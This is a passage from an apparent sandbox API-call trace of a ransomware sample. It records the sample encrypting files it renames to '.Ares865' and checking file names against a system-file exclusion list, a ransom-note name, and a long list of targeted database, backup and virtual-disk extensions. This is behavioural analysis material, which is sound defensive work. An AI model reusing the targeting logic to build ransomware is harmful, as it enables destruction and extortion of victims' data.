(normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.ares865"), dwFlags=0x1) returned 1 [0089.274] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.275] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=60533) returned 1 [0089.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.275] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.275] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.276] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.276] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.276] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xef80, lpName=0x0) returned 0x15c [0089.277] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xef80) returned 0x190000 [0089.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.282] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.283] CloseHandle (hObject=0x15c) returned 1 [0089.283] CloseHandle (hObject=0x118) returned 1 [0089.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.283] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="aoldtz.exe") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2=".") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="..") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="windows") returned -1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="bootmgr") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="temp") returned -1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="pagefile.sys") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="boot") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="ids.txt") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="ntuser.dat") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="perflogs") returned 1 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2="MSBuild") returned 1 [0089.284] lstrlenW (lpString="scan_property.ico") returned 17 [0089.284] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0089.284] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="scan_property.ico" | out: lpString1="scan_property.ico") returned="scan_property.ico" [0089.284] lstrlenW (lpString="scan_property.ico") returned 17 [0089.284] lstrlenW (lpString="Ares865") returned 7 [0089.284] lstrcmpiW (lpString1="rty.ico", lpString2="Ares865") returned 1 [0089.284] lstrlenW (lpString=".dll") returned 4 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2=".dll") returned 1 [0089.284] lstrlenW (lpString=".lnk") returned 4 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2=".lnk") returned 1 [0089.284] lstrlenW (lpString=".ini") returned 4 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2=".ini") returned 1 [0089.284] lstrlenW (lpString=".sys") returned 4 [0089.284] lstrcmpiW (lpString1="scan_property.ico", lpString2=".sys") returned 1 [0089.284] lstrlenW (lpString="scan_property.ico") returned 17 [0089.284] lstrlenW (lpString="bak") returned 3 [0089.284] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.284] lstrlenW (lpString="ba_") returned 3 [0089.284] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.284] lstrlenW (lpString="dbb") returned 3 [0089.284] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.284] lstrlenW (lpString="vmdk") returned 4 [0089.284] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.284] lstrlenW (lpString="rar") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.285] lstrlenW (lpString="zip") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.285] lstrlenW (lpString="tgz") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.285] lstrlenW (lpString="vbox") returned 4 [0089.285] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.285] lstrlenW (lpString="vdi") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.285] lstrlenW (lpString="vhd") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.285] lstrlenW (lpString="vhdx") returned 4 [0089.285] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.285] lstrlenW (lpString="avhd") returned 4 [0089.285] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.285] lstrlenW (lpString="db") returned 2 [0089.285] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.285] lstrlenW (lpString="db2") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.285] lstrlenW (lpString="db3") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.285] lstrlenW (lpString="dbf") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.285] lstrlenW (lpString="mdf") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.285] lstrlenW (lpString="mdb") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.285] lstrlenW (lpString="sql") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.285] lstrlenW (lpString="sqlite") returned 6 [0089.285] lstrcmpiW (lpString1="ty.ico", lpString2="sqlite") returned 1 [0089.285] lstrlenW (lpString="sqlite3") returned 7 [0089.285] lstrcmpiW (lpString1="rty.ico", lpString2="sqlite3") returned -1 [0089.285] lstrlenW (lpString="sqlitedb") returned 8 [0089.285] lstrcmpiW (lpString1="erty.ico", lpString2="sqlitedb") returned -1 [0089.285] lstrlenW (lpString="xml") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.285] lstrlenW (lpString="$er") returned 3 [0089.285] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.285] lstrlenW (lpString="4dd") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.286] lstrlenW (lpString="4dl") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.286] lstrlenW (lpString="^^^") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.286] lstrlenW (lpString="abs") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.286] lstrlenW (lpString="abx") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.286] lstrlenW (lpString="accdb") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accdb") returned 1 [0089.286] lstrlenW (lpString="accdc") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accdc") returned 1 [0089.286] lstrlenW (lpString="accde") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accde") returned 1 [0089.286] lstrlenW (lpString="accdr") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accdr") returned 1 [0089.286] lstrlenW (lpString="accdt") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accdt") returned 1 [0089.286] lstrlenW (lpString="accdw") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accdw") returned 1 [0089.286] lstrlenW (lpString="accft") returned 5 [0089.286] lstrcmpiW (lpString1="y.ico", lpString2="accft") returned 1 [0089.286] lstrlenW (lpString="adb") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.286] lstrlenW (lpString="adb") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.286] lstrlenW (lpString="ade") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.286] lstrlenW (lpString="adf") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.286] lstrlenW (lpString="adn") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.286] lstrlenW (lpString="adp") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.286] lstrlenW (lpString="alf") returned 3 [0089.286] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.286] lstrlenW (lpString="ask") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.287] lstrlenW (lpString="btr") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.287] lstrlenW (lpString="cat") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.287] lstrlenW (lpString="cdb") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.287] lstrlenW (lpString="ckp") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.287] lstrlenW (lpString="cma") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.287] lstrlenW (lpString="cpd") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.287] lstrlenW (lpString="dacpac") returned 6 [0089.287] lstrcmpiW (lpString1="ty.ico", lpString2="dacpac") returned 1 [0089.287] lstrlenW (lpString="dad") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.287] lstrlenW (lpString="dadiagrams") returned 10 [0089.287] lstrcmpiW (lpString1="operty.ico", lpString2="dadiagrams") returned 1 [0089.287] lstrlenW (lpString="daschema") returned 8 [0089.287] lstrcmpiW (lpString1="erty.ico", lpString2="daschema") returned 1 [0089.287] lstrlenW (lpString="db-journal") returned 10 [0089.287] lstrcmpiW (lpString1="operty.ico", lpString2="db-journal") returned 1 [0089.287] lstrlenW (lpString="db-shm") returned 6 [0089.287] lstrcmpiW (lpString1="ty.ico", lpString2="db-shm") returned 1 [0089.287] lstrlenW (lpString="db-wal") returned 6 [0089.287] lstrcmpiW (lpString1="ty.ico", lpString2="db-wal") returned 1 [0089.287] lstrlenW (lpString="dbc") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.287] lstrlenW (lpString="dbs") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.287] lstrlenW (lpString="dbt") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.287] lstrlenW (lpString="dbv") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.287] lstrlenW (lpString="dbx") returned 3 [0089.287] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.287] lstrlenW (lpString="dcb") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.288] lstrlenW (lpString="dct") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.288] lstrlenW (lpString="dcx") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.288] lstrlenW (lpString="ddl") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.288] lstrlenW (lpString="dlis") returned 4 [0089.288] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.288] lstrlenW (lpString="dp1") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.288] lstrlenW (lpString="dqy") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.288] lstrlenW (lpString="dsk") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.288] lstrlenW (lpString="dsn") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.288] lstrlenW (lpString="dtsx") returned 4 [0089.288] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.288] lstrlenW (lpString="dxl") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.288] lstrlenW (lpString="eco") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.288] lstrlenW (lpString="ecx") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.288] lstrlenW (lpString="edb") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.288] lstrlenW (lpString="epim") returned 4 [0089.288] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.288] lstrlenW (lpString="fcd") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.288] lstrlenW (lpString="fdb") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.288] lstrlenW (lpString="fic") returned 3 [0089.288] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.288] lstrlenW (lpString="flexolibrary") returned 12 [0089.288] lstrcmpiW (lpString1="property.ico", lpString2="flexolibrary") returned 1 [0089.288] lstrlenW (lpString="fm5") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.289] lstrlenW (lpString="fmp") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.289] lstrlenW (lpString="fmp12") returned 5 [0089.289] lstrcmpiW (lpString1="y.ico", lpString2="fmp12") returned 1 [0089.289] lstrlenW (lpString="fmpsl") returned 5 [0089.289] lstrcmpiW (lpString1="y.ico", lpString2="fmpsl") returned 1 [0089.289] lstrlenW (lpString="fol") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.289] lstrlenW (lpString="fp3") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.289] lstrlenW (lpString="fp4") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.289] lstrlenW (lpString="fp5") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.289] lstrlenW (lpString="fp7") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.289] lstrlenW (lpString="fpt") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.289] lstrlenW (lpString="frm") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.289] lstrlenW (lpString="gdb") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.289] lstrlenW (lpString="gdb") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.289] lstrlenW (lpString="grdb") returned 4 [0089.289] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.289] lstrlenW (lpString="gwi") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.289] lstrlenW (lpString="hdb") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.289] lstrlenW (lpString="his") returned 3 [0089.289] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.289] lstrlenW (lpString="ib") returned 2 [0089.289] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.289] lstrlenW (lpString="idb") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.290] lstrlenW (lpString="ihx") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.290] lstrlenW (lpString="itdb") returned 4 [0089.290] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.290] lstrlenW (lpString="itw") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.290] lstrlenW (lpString="jet") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.290] lstrlenW (lpString="jtx") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.290] lstrlenW (lpString="kdb") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.290] lstrlenW (lpString="kexi") returned 4 [0089.290] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.290] lstrlenW (lpString="kexic") returned 5 [0089.290] lstrcmpiW (lpString1="y.ico", lpString2="kexic") returned 1 [0089.290] lstrlenW (lpString="kexis") returned 5 [0089.290] lstrcmpiW (lpString1="y.ico", lpString2="kexis") returned 1 [0089.290] lstrlenW (lpString="lgc") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.290] lstrlenW (lpString="lwx") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.290] lstrlenW (lpString="maf") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.290] lstrlenW (lpString="maq") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.290] lstrlenW (lpString="mar") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.290] lstrlenW (lpString="marshal") returned 7 [0089.290] lstrcmpiW (lpString1="rty.ico", lpString2="marshal") returned 1 [0089.290] lstrlenW (lpString="mas") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.290] lstrlenW (lpString="mav") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.290] lstrlenW (lpString="maw") returned 3 [0089.290] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.290] lstrlenW (lpString="mdbhtml") returned 7 [0089.291] lstrcmpiW (lpString1="rty.ico", lpString2="mdbhtml") returned 1 [0089.291] lstrlenW (lpString="mdn") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.291] lstrlenW (lpString="mdt") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.291] lstrlenW (lpString="mfd") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.291] lstrlenW (lpString="mpd") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.291] lstrlenW (lpString="mrg") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.291] lstrlenW (lpString="mud") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.291] lstrlenW (lpString="mwb") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.291] lstrlenW (lpString="myd") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.291] lstrlenW (lpString="ndf") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.291] lstrlenW (lpString="nnt") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.291] lstrlenW (lpString="nrmlib") returned 6 [0089.291] lstrcmpiW (lpString1="ty.ico", lpString2="nrmlib") returned 1 [0089.291] lstrlenW (lpString="ns2") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.291] lstrlenW (lpString="ns3") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.291] lstrlenW (lpString="ns4") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.291] lstrlenW (lpString="nsf") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.291] lstrlenW (lpString="nv") returned 2 [0089.291] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.291] lstrlenW (lpString="nv2") returned 3 [0089.291] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.291] lstrlenW (lpString="nwdb") returned 4 [0089.291] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.291] lstrlenW (lpString="nyf") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.292] lstrlenW (lpString="odb") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.292] lstrlenW (lpString="odb") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.292] lstrlenW (lpString="oqy") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.292] lstrlenW (lpString="ora") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.292] lstrlenW (lpString="orx") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.292] lstrlenW (lpString="owc") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.292] lstrlenW (lpString="p96") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.292] lstrlenW (lpString="p97") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.292] lstrlenW (lpString="pan") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.292] lstrlenW (lpString="pdb") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.292] lstrlenW (lpString="pdm") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.292] lstrlenW (lpString="pnz") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.292] lstrlenW (lpString="qry") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.292] lstrlenW (lpString="qvd") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.292] lstrlenW (lpString="rbf") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.292] lstrlenW (lpString="rctd") returned 4 [0089.292] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.292] lstrlenW (lpString="rod") returned 3 [0089.292] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.292] lstrlenW (lpString="rodx") returned 4 [0089.292] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.292] lstrlenW (lpString="rpd") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.293] lstrlenW (lpString="rsd") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.293] lstrlenW (lpString="sas7bdat") returned 8 [0089.293] lstrcmpiW (lpString1="erty.ico", lpString2="sas7bdat") returned -1 [0089.293] lstrlenW (lpString="sbf") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.293] lstrlenW (lpString="scx") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.293] lstrlenW (lpString="sdb") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.293] lstrlenW (lpString="sdc") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.293] lstrlenW (lpString="sdf") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.293] lstrlenW (lpString="sis") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.293] lstrlenW (lpString="spq") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.293] lstrlenW (lpString="te") returned 2 [0089.293] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.293] lstrlenW (lpString="teacher") returned 7 [0089.293] lstrcmpiW (lpString1="rty.ico", lpString2="teacher") returned -1 [0089.293] lstrlenW (lpString="tmd") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.293] lstrlenW (lpString="tps") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.293] lstrlenW (lpString="trc") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.293] lstrlenW (lpString="trc") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.293] lstrlenW (lpString="trm") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.293] lstrlenW (lpString="udb") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.293] lstrlenW (lpString="udl") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.293] lstrlenW (lpString="usr") returned 3 [0089.293] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.294] lstrlenW (lpString="v12") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.294] lstrlenW (lpString="vis") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.294] lstrlenW (lpString="vpd") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.294] lstrlenW (lpString="vvv") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.294] lstrlenW (lpString="wdb") returned 